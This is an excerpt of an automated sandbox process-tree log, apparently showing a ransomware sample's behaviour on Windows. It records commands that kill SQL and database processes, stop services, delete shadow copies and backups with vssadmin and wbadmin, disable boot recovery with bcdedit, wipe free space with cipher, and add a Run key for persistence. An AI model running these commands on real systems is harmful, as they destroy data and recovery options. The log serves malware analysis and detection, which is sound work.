    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdlauncher.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4336
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:228
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3088
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im Ssms.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:540
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
      4⤵
      PID:4504
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im SQLAGENT.EXE
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4120
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
      4⤵
      PID:2116
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im fdhost.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5000
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4068
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
      4⤵
      PID:952
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im ReportingServicesService.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
      4⤵
      PID:2788
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im msftesql.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3580
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
      4⤵
      PID:2852
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -im pg_ctl.exe
        5⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2324
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2340
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
      4⤵
      PID:1592
    - - C:\Windows\system32\taskkill.exe
        
        taskkill -f -impostgres.exe
        5⤵
        Kills process with taskkill
        
        PID:3944
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
      4⤵
      PID:3328
    - - C:\Windows\system32\net.exe
        
        net stop MSSQLServerADHelper100
        5⤵
        
        PID:2028
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQLServerADHelper100
        6⤵
        
        PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:448
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
      4⤵
      PID:5116
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$ISARS
        5⤵
        
        PID:4536
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$ISARS
        6⤵
        
        PID:212
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
      4⤵
      PID:3708
    - - C:\Windows\system32\net.exe
        
        net stop MSSQL$MSFW
        5⤵
        
        PID:3504
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSSQL$MSFW
        6⤵
        
        PID:516
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3900
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
      4⤵
      PID:1084
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$ISARS
        5⤵
        
        PID:1420
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$ISARS
        6⤵
        
        PID:4556
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3576
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
      4⤵
      PID:4388
    - - C:\Windows\system32\net.exe
        
        net stop SQLAgent$MSFW
        5⤵
        
        PID:4136
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$MSFW
        6⤵
        
        PID:1660
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
    3⤵
    - System Location Discovery: System Language Discovery
    PID:60
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
      4⤵
      PID:3348
    - - C:\Windows\system32\net.exe
        
        net stop SQLBrowser
        5⤵
        
        PID:2036
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLBrowser
        6⤵
        
        PID:3056
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2864
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
      4⤵
      PID:4316
    - - C:\Windows\system32\net.exe
        
        net stop REportServer$ISARS
        5⤵
        
        PID:2224
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop REportServer$ISARS
        6⤵
        
        PID:376
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
      4⤵
      PID:1816
    - - C:\Windows\system32\net.exe
        
        net stop SQLWriter
        5⤵
        
        PID:4356
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLWriter
        6⤵
        
        PID:4044
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1296
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
      4⤵
      PID:2060
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin.exe Delete Shadows /All /Quiet
        5⤵
        Interacts with shadow copies
        
        PID:2316
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
      4⤵
      PID:2956
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete backup -keepVersion:0 -quiet
        5⤵
        Deletes system backups
        Drops file in Windows directory
        
        PID:1860
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2200
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
      4⤵
      PID:3892
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTATEBACKUP
        5⤵
        Deletes System State backups
        
        PID:1504
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
      4⤵
      PID:1380
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
        5⤵
        Drops file in Windows directory
        
        PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
      4⤵
      PID:3592
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic.exe SHADOWCOPY /nointeractive
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4808
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1684
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
      4⤵
      PID:228
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} recoverynabled No
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4076
- - C:\Windows\SysWOW64\cmd.exe
    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      PID:3088
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:5008
- - C:\Windows\SYSTEM32\cipher.exe
    cipher /w:\\?\C:
    3⤵
    PID:5416
- - C:\Windows\SYSTEM32\cipher.exe
    cipher /w:\\?\F:
    3⤵
    - Enumerates connected drives
    PID:5424
- - C:\Windows\SYSTEM32\cipher.exe
    cipher /w:\\?\A:
    3⤵
    - Enumerates connected drives
    PID:5432
- C:\Users\Admin\AppData\Local\Temp\13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe
  \\?\C:\Users\Admin\AppData\Local\Temp\13d9213ef48c184747cdbcb8745d55d6ddb696b7afc85e88575812550f3d43f3.exe -network
  2⤵
  - Adds Run key to start application
  PID:5928